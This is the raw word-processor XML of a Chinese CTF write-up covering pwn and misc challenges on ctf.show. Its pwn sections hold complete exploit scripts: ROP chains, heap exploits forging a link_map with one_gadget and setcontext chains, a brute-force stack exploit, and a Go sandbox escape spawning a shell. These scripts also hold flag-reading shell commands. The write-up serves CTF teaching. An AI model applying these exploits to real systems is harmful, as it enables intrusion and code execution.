              <w:t>payload = flat([cyclic(30),zz955,pop_rsi_rdi_ret,pop_rsi_rdi_ret,0,bss,xor_rdx,syscall])</w:t>
              <w:br/>
              <w:t>print("len:" + hex(len(payload)))</w:t>
              <w:br/>
              <w:t>io.send(payload)</w:t>
              <w:br/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io.interactive()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pwn3  Happy_New_Year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Happy_New_Year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bit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200分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exp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pwn import *</w:t>
              <w:br/>
              <w:t>context.log_level='debug'</w:t>
              <w:br/>
              <w:t>#io = process('./pwn')</w:t>
              <w:br/>
              <w:t>io = remote('pwn.challenge.ctf.show',28294)</w:t>
              <w:br/>
              <w:t>elf = ELF('./pwn')</w:t>
              <w:br/>
              <w:t>libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')</w:t>
              <w:br/>
              <w:br/>
              <w:t>def add(index,size):</w:t>
              <w:br/>
              <w:t xml:space="preserve">        io.sendlineafter('¥¥¥¥¥¥', str(1))</w:t>
              <w:br/>
              <w:t xml:space="preserve">        io.sendlineafter('index:\n', str(index))</w:t>
              <w:br/>
              <w:t xml:space="preserve">        io.sendlineafter("Size:\n", str(size))</w:t>
              <w:br/>
              <w:br/>
              <w:t>def show(index):</w:t>
              <w:br/>
              <w:t xml:space="preserve">        io.sendlineafter('¥¥¥¥¥¥', str(2))</w:t>
              <w:br/>
              <w:t xml:space="preserve">        io.sendlineafter('index:\n', str(index))</w:t>
              <w:br/>
              <w:br/>
              <w:t>def edit(index, content):</w:t>
              <w:br/>
              <w:t xml:space="preserve">        io.sendlineafter('¥¥¥¥¥¥', str(3))</w:t>
              <w:br/>
              <w:t xml:space="preserve">        io.sendlineafter('index:\n', str(index))</w:t>
              <w:br/>
              <w:t xml:space="preserve">        io.sendafter("context: \n",content)</w:t>
              <w:br/>
              <w:br/>
              <w:t>def delete(index):</w:t>
              <w:br/>
              <w:t xml:space="preserve">        io.sendlineafter('¥¥¥¥¥¥', str(4))</w:t>
              <w:br/>
              <w:t xml:space="preserve">        io.sendlineafter('index:\n', str(index))</w:t>
              <w:br/>
              <w:br/>
              <w:t>add(0,0x428)</w:t>
              <w:br/>
              <w:t>add(1,0x500)</w:t>
              <w:br/>
              <w:t>add(2,0x418)</w:t>
              <w:br/>
              <w:t>delete(0)</w:t>
              <w:br/>
              <w:t>add(3,0x500)</w:t>
              <w:br/>
              <w:br/>
              <w:t>show(0)</w:t>
              <w:br/>
              <w:t>libc_base = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 0x3ec090</w:t>
              <w:br/>
              <w:t>edit(0,'b'*0x10)</w:t>
              <w:br/>
              <w:t>show(0)</w:t>
              <w:br/>
              <w:t>io.recvuntil('b'*0x10)</w:t>
              <w:br/>
              <w:t>heap_base = u64(io.recv(6).ljust(8,b'\x00'))-0x250</w:t>
              <w:br/>
              <w:br/>
              <w:t>rtld_global = libc_base + 0x61b060</w:t>
              <w:br/>
              <w:t>one_gadget = libc_base + 0x4f302</w:t>
              <w:br/>
              <w:t>delete(2)</w:t>
              <w:br/>
              <w:t>edit(0,p64(libc_base + 0x3ec090)*2+p64(heap_base+0x250)+p64(rtld_global-0x20))</w:t>
              <w:br/>
              <w:t>add(4,0x500)</w:t>
              <w:br/>
              <w:br/>
              <w:t>link_map=p64(0)*1</w:t>
              <w:br/>
              <w:t>link_map+=p64(libc_base+0x61c710)</w:t>
              <w:br/>
              <w:t>link_map+=p64(0)</w:t>
              <w:br/>
              <w:t>link_map+=p64(heap_base+0xb90)</w:t>
              <w:br/>
              <w:t xml:space="preserve">link_map+=p64(0)*28 </w:t>
              <w:br/>
              <w:t>link_map+=p64(heap_base+0xc08+0x98)</w:t>
              <w:br/>
              <w:t>link_map+=p64(heap_base+0xc08+32+0x98)</w:t>
              <w:br/>
              <w:t>link_map+=p64(heap_base+0xc08+0x10+0x98)</w:t>
              <w:br/>
              <w:t>link_map+=p64(8)</w:t>
              <w:br/>
              <w:t>link_map+=p64(one_gadget)</w:t>
              <w:br/>
              <w:t>link_map+=p64(heap_base+0xb90)</w:t>
              <w:br/>
              <w:t>link_map+=p64(0)*58</w:t>
              <w:br/>
              <w:t>link_map+=p64(0x800000000)</w:t>
              <w:br/>
              <w:br/>
              <w:t>edit(2,link_map)</w:t>
              <w:br/>
              <w:t>io.sendlineafter('¥¥¥¥¥¥', str(5))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io.interactive()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pwn4  Heap_Harmony_Festivity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Heap_Harmony_Festivity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bit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200分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exp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pwn import *</w:t>
              <w:br/>
              <w:t>context.log_level='debug'</w:t>
              <w:br/>
              <w:t>#io = process("./pwn")</w:t>
              <w:br/>
              <w:t>io = remote("pwn.challenge.ctf.show",28278)</w:t>
              <w:br/>
              <w:t>libc = ELF('/home/bit/glibc-all-in-one/libs/2.31-0ubuntu9_amd64/libc-2.31.so')</w:t>
              <w:br/>
              <w:br/>
              <w:t>def add(index,size):</w:t>
              <w:br/>
              <w:t xml:space="preserve">        io.sendlineafter('¥¥¥¥¥¥', str(1))</w:t>
              <w:br/>
              <w:t xml:space="preserve">        io.sendlineafter('index:\n', str(index))</w:t>
              <w:br/>
              <w:t xml:space="preserve">        io.sendlineafter("Size:\n", str(size))</w:t>
              <w:br/>
              <w:br/>
              <w:t>def show(index):</w:t>
              <w:br/>
              <w:t xml:space="preserve">        io.sendlineafter('¥¥¥¥¥¥', str(2))</w:t>
              <w:br/>
              <w:t xml:space="preserve">        io.sendlineafter('index:\n', str(index))</w:t>
              <w:br/>
              <w:br/>
              <w:t>def edit(index, content):</w:t>
              <w:br/>
              <w:t xml:space="preserve">        io.sendlineafter('¥¥¥¥¥¥', str(3))</w:t>
              <w:br/>
              <w:t xml:space="preserve">        io.sendlineafter('index:\n', str(index))</w:t>
              <w:br/>
              <w:t xml:space="preserve">        io.sendafter("context: \n",content)</w:t>
              <w:br/>
              <w:br/>
              <w:t>def delete(index):</w:t>
              <w:br/>
              <w:t xml:space="preserve">        io.sendlineafter('¥¥¥¥¥¥', str(4))</w:t>
              <w:br/>
              <w:t xml:space="preserve">        io.sendlineafter('index:\n', str(index))</w:t>
              <w:br/>
              <w:br/>
              <w:t>add(0,0x428)</w:t>
              <w:br/>
              <w:t>add(1,0x500)</w:t>
              <w:br/>
              <w:t>add(2,0x418)</w:t>
              <w:br/>
              <w:t>delete(0)</w:t>
              <w:br/>
              <w:t>add(3,0x500)</w:t>
              <w:br/>
              <w:br/>
              <w:t>show(0)</w:t>
              <w:br/>
              <w:t>libc_base= u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 0x1ebfd0</w:t>
              <w:br/>
              <w:t>edit(0,'a'*0x10)</w:t>
              <w:br/>
              <w:br/>
              <w:t>show(0)</w:t>
              <w:br/>
              <w:t>io.recvuntil('a'*0x10)</w:t>
              <w:br/>
              <w:t>heap_base=u64(io.recv(6).ljust(8,b'\x00'))-0x290</w:t>
              <w:br/>
              <w:br/>
              <w:t>rtld_global=libc_base+0x222060</w:t>
              <w:br/>
              <w:t>one_gadget=libc_base+0xe6aee</w:t>
              <w:br/>
              <w:t>ret_addr=libc_base+0x0000000000025679</w:t>
              <w:br/>
              <w:t>setcontext=0x580DD+libc_base</w:t>
              <w:br/>
              <w:t>pop_rdi=libc_base+0x0000000000026b72</w:t>
              <w:br/>
              <w:t>pop_rsi=libc_base+0x0000000000027529</w:t>
              <w:br/>
              <w:t>pop_rdx_r12=libc_base+0x000000000011c1e1</w:t>
              <w:br/>
              <w:t>write_addr=libc_base+libc.symbols['write']</w:t>
              <w:br/>
              <w:t>open_addr=libc_base+libc.symbols['open']</w:t>
              <w:br/>
              <w:br/>
              <w:t>read_addr=libc.sym['read']+libc_base</w:t>
              <w:br/>
              <w:t>delete(2)</w:t>
              <w:br/>
              <w:t>edit(0,p64(libc_base+0x3ec090)*2+p64(heap_base+0x290)+p64(rtld_global-0x20))</w:t>
              <w:br/>
              <w:br/>
              <w:t>add(4,0x500)</w:t>
              <w:br/>
              <w:br/>
              <w:t>link_map=p64(0)</w:t>
              <w:br/>
              <w:t>link_map+=p64(libc_base+0x223740)</w:t>
              <w:br/>
              <w:t>link_map+=p64(0)</w:t>
              <w:br/>
              <w:t>link_map+=p64(heap_base+0xb90+0x40)</w:t>
              <w:br/>
              <w:t xml:space="preserve">link_map+=p64(0)*28 </w:t>
              <w:br/>
              <w:t>link_map+=p64(heap_base+0xc08+0x98+0x40)</w:t>
              <w:br/>
              <w:t>link_map+=p64(heap_base+0xc08+32+0x98+0x40)</w:t>
              <w:br/>
              <w:t>link_map+=p64(heap_base+0xc08+0x10+0x98+0x40)</w:t>
              <w:br/>
              <w:t>link_map+=p64(0x20)</w:t>
              <w:br/>
              <w:t>link_map+="flag\x00\x00\x00\x00"</w:t>
              <w:br/>
              <w:t>link_map+=p64(heap_base+0xb90+0x40)</w:t>
              <w:br/>
              <w:t>link_map+=p64(setcontext)</w:t>
              <w:br/>
              <w:t>link_map+=p64(ret_addr)</w:t>
              <w:br/>
              <w:t>link_map+=p64(0)*12</w:t>
              <w:br/>
              <w:t>link_map+=p64(0)</w:t>
              <w:br/>
              <w:t>link_map+=p64(heap_base+0xdc8)</w:t>
              <w:br/>
              <w:t>link_map+=p64(0)*2</w:t>
              <w:br/>
              <w:t>link_map+=p64(0x100)</w:t>
              <w:br/>
              <w:t>link_map+=p64(0)*2</w:t>
              <w:br/>
              <w:br/>
              <w:t>link_map+=p64(heap_base+0xdc8)</w:t>
              <w:br/>
              <w:t>link_map+=p64(read_addr)</w:t>
              <w:br/>
              <w:br/>
              <w:br/>
              <w:t>link_map+=p64(0)*36</w:t>
              <w:br/>
              <w:t>link_map+=p64(0x800000000)</w:t>
              <w:br/>
              <w:t>edit(2,link_map)</w:t>
              <w:br/>
              <w:t>io.sendlineafter('¥¥¥¥¥¥', str(5))</w:t>
              <w:br/>
              <w:br/>
              <w:t>flag_addr=heap_base+0xd00</w:t>
              <w:br/>
              <w:t>orw=p64(pop_rdi)+p64(flag_addr)</w:t>
              <w:br/>
              <w:t>orw+=p64(pop_rsi)+p64(0)</w:t>
              <w:br/>
              <w:t>orw+=p64(open_addr)</w:t>
              <w:br/>
              <w:t>orw+=p64(pop_rdi)+p64(3)</w:t>
              <w:br/>
              <w:t>orw+=p64(pop_rsi)+p64(heap_base)</w:t>
              <w:br/>
              <w:t>orw+=p64(pop_rdx_r12)+p64(0x50)+p64(0)</w:t>
              <w:br/>
              <w:t>orw+=p64(read_addr)</w:t>
              <w:br/>
              <w:t>orw+=p64(pop_rdi)+p64(1)</w:t>
              <w:br/>
              <w:t>orw+=p64(pop_rsi)+p64(heap_base)</w:t>
              <w:br/>
              <w:t>orw+=p64(pop_rdx_r12)+p64(0x50)+p64(0)</w:t>
              <w:br/>
              <w:t>orw+=p64(write_addr)</w:t>
              <w:br/>
              <w:t>io.sendline(orw)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io.interactive()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pwn5  yes_or_no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yes_or_no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久而不念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300分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爆破概率为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>1/0xff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exp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pwn import *</w:t>
              <w:br/>
              <w:t>from LibcSearcher import *</w:t>
              <w:br/>
              <w:t>context.log_level = 'debug'</w:t>
              <w:br/>
              <w:t>elf=ELF("./pwn")</w:t>
              <w:br/>
              <w:t>one=0xe3b2e</w:t>
              <w:br/>
              <w:t>pop_r12=0x401176</w:t>
              <w:br/>
              <w:t>pop_r15=0x401179</w:t>
              <w:br/>
              <w:t>ret=0x401016</w:t>
              <w:br/>
              <w:t>yes=0x401150</w:t>
              <w:br/>
              <w:t>while 1:</w:t>
              <w:br/>
              <w:t xml:space="preserve">   io=remote('pwn.challenge.ctf.show',28264)</w:t>
              <w:br/>
              <w:t xml:space="preserve">   #io=process("./pwn")</w:t>
              <w:br/>
              <w:t xml:space="preserve">   io.send(b'a'*0x20+b'b'*8+p64(pop_r12)+p64(0)+p64(yes))</w:t>
              <w:br/>
              <w:t xml:space="preserve">   sleep(0.01)</w:t>
              <w:br/>
              <w:t xml:space="preserve">   io.send(b'a'*0x20+b'c'*8+p64(pop_r15)+p64(0)+p64(yes))</w:t>
              <w:br/>
              <w:t xml:space="preserve">   sleep(0.01)</w:t>
              <w:br/>
              <w:t xml:space="preserve">   #使r12，r15归零，满足one_gadget条件</w:t>
              <w:br/>
              <w:t xml:space="preserve">   for i in range(15):</w:t>
              <w:br/>
              <w:t xml:space="preserve">      io.send(b'a'*0x20+b'd'*8+p64(yes))</w:t>
              <w:br/>
              <w:t xml:space="preserve">      sleep(0.01)</w:t>
              <w:br/>
              <w:t xml:space="preserve">   #不断抬栈，直到rbp的下一位可以利用</w:t>
              <w:br/>
              <w:t xml:space="preserve">   io.send(b'a'*0x20+b'd'*8+b'\x2e\x3b\x0e')#爆破one_gadget</w:t>
              <w:br/>
              <w:t xml:space="preserve">   try:</w:t>
              <w:br/>
              <w:t xml:space="preserve">      io.sendline('echo sess')</w:t>
              <w:br/>
              <w:t xml:space="preserve">      if b'sess'in io.recv(1024):</w:t>
              <w:br/>
              <w:t xml:space="preserve">         io.interactive()</w:t>
              <w:br/>
              <w:t xml:space="preserve">   except Exception:</w:t>
              <w:br/>
              <w:t xml:space="preserve">      io.close()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continue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pwn6 ESCAPE GO BOX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ESCAPE GO BOX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shenghuo2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400分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经过fuzz，可以知道过滤的关键字有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blacklist = ['sh','flag','fmt','io','log','server','cat','read','Read','os','exec','Print']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最短的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>exp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>可以是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看起来好像是不能用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>和os下的os/exec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出题人的预期解是用的syscall库下的Exec方法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https://pkg.go.dev/syscall#Exec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func </w:t>
      </w:r>
      <w:hyperlink r:id="rId20">
        <w:r>
          <w:rPr>
            <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
            <w:color w:val="3370ff"/>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:t>Exec</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId21">
        <w:r>
          <w:rPr>
            <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
            <w:color w:val="3370ff"/>
            <w:sz w:val="22"/>
          </w:rPr>
          <w:t>¶</w:t>
        </w:r>
      </w:hyperlink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Exec(argv0 string, argv []string, envv []string) (err error)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"s"+"h"，简单的拼接        构造sh可以得到交互式终端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也可以不用sh，慢慢读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这样基本上就能达到150字符的限制以内了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再稍微加点pwn的小技巧，比如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>$0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可提供的最短</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>exp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>为：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main;import a "syscall";func main(){a.Exec("/bin/bas"+"h",[]string{"$0"},nil)}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长度86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base64编码后为116字符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期待选手的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>wp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exp</w:t>
      </w:r>
      <w:bookmarkEnd w:id="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pwn import *</w:t>
              <w:br/>
              <w:t>context.log_level = "debug"</w:t>
              <w:br/>
              <w:t>r = remote('192.168.123.172','9001')</w:t>
              <w:br/>
              <w:t>r.sendlineafter(b'input your base64ed code: ',b'cGFja2FnZSBtYWluCmltcG9ydCgic3lzY2FsbCIpCmZ1bmMgbWFpbigpewp4Oj1bXXN0cmluZ3sicyIgKyAiaCJ9CnN5c2NhbGwuRXhlYygiL2Jpbi9iYXMiKyJoIix4LHgpCn0=')</w:t>
              <w:br/>
              <w:t>print("wait 10 second")</w:t>
              <w:br/>
              <w:t>sleep(10)</w:t>
              <w:br/>
              <w:t>r.sendline(b'cat /flag')</w:t>
              <w:br/>
              <w:t>r.sendline(b'cat /home/ctf/.*')</w:t>
              <w:br/>
              <w:t>print(r.recv())</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>r.interactive()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MISC 部分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misc1 以假换真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以假换真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机气人师傅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100分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听说你精通C、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>C++</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、Java、C#、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>VB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HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、Delphi、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>JavaScript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PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>等语言的拼写,熟练</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>PhotoShop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">、Illustrator </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、CorelDraw、Flash CS、AutoCAD、Office等软件的卸载,掌握Windows Server、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Unix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、Lunix等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>操作系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的关机。以上内容本题都不考。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出题/解题思路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6.zip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winrar解压得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，超链接与文件名不符（hedan.jpg和hetao.png），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文件头 =&gt; 快压解压（360压缩打开的是下一步中的压缩包） =&gt; 得到hetao.png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hetao.png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图片尾附加压缩包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压缩包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用hedan.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>明文</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击得到baidu.png，c1e1943e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解压密码：密码不重要，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:strike w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>明文</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:strike w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击测试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baidu.png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图标是百度网盘，上传后得到flag图片(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>md5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>碰撞)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&lt;!-- 题外话：图片baidu.png格式是jpg，改扩展名后注释中作者信息写的我的qq号 --&gt;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flag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flag{487d06fc-8f40-421d-b8d0-e84b2da50579}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 xml:space="preserve">misc2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CTF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>的一生如履薄冰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题目名称  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CTF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的一生如履薄冰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王八七七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无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200分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[CTF的一生如履薄冰writeup.pdf]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misc3 签到·又见童话镇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签到·又见童话镇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萌新阿狸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光有眼睛也许还不太够，需要一点点数学。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分值：300分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题目提示 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两秒一个字母，慢慢来，你可以的。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前面不清楚没关系，重播了三遍，总有能看清的。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为什么特效要用绿幕呢？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60帧一组提取，用绿色通道，做fft，然后调一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>清晰度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。可以得到类似下面的东西，邮电费眼睛，用力看还是能看出来的。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870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最终flag ctfshow{610ea30b-1a2b-4a20-93dc-c32985c3a7cb}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misc4 base-XX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base-XX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Xuxuzi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400分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Just another base-XX decode challenge!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base的本质是进制，base-XX所以是-XX进制。页面文本和注释里各有一段编码，多开几个靶机可以发现页面上那段编码的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>字符集</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>一直在变，但注释里那段一直在base64字符表范围内。按对应进制和常用字符表解码注释得到页面上那段base-XX编码时使用的字符表，再解码一次得到flag。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>exp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>供参考，不建议直接抄：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requests, html, libnum, io, zipfile, re</w:t>
              <w:br/>
              <w:t>from string import *</w:t>
              <w:br/>
              <w:br/>
              <w:t>t = input('Input your challenge URL here: \n')</w:t>
              <w:br/>
              <w:t>b = [html.unescape(requests.get(t).text.splitlines()[i%2+5][(98-i)*2+3:-4]) for i in b'base'][:2]</w:t>
              <w:br/>
              <w:t>d = lambda a, b: libnum.n2s(sum(a.index(j) * (~len(a) + 1) ** i for i, j in enumerate(b[::-1])))</w:t>
              <w:br/>
              <w:t>tmp = zipfile.ZipFile(io.BytesIO(d(d(f'{ascii_uppercase}{ascii_lowercase}{digits}+/', b[-1]).decode().splitlines()[-1], b[0])))</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>print(re.findall(r'ctfshow{.*}', tmp.read(tmp.filelist[0].filename).decode())[0])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misc5 the Cipher of B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the Cipher of B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Bubuzi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400分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Just another docx stego challenge!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培根密码的最终密文形式并不是一堆A和B，而是采用两种不同字体书写的字符。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当然，本题还需要考虑到手写文本和电子文档在“字体”处理上的一些不同，以及使用哪一种加密对应表，以及三段密钥的排列顺序。因为是0解，剩下的部分留作课后练习。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另外，关于文本内容，搜索一下“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:i w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Lorem ipsum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>”就能知道这是一种通常用于平面排版设计的“假文本”，不包含任何实际内容或意义（也不包含什么Lorem ipsum加密之类的东西，事实上我也不知道有没有这种加密），换言之没有必要关注中间这段文本的内容本身。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misc6 四国军棋_网线鲨鱼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四国军棋_网线鲨鱼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ThTsOd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500分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套神玩四国军棋总是赢不了，于是使用网线鲨鱼看别人棋，完成附件中Misc1.py获取flag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找到布阵时的流量（服务器发送）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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>数据格式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537769746368456e642020202020202020202020 0a0c050a080803090b0a09040c030c07020206070b0b020106 000000000002000000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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
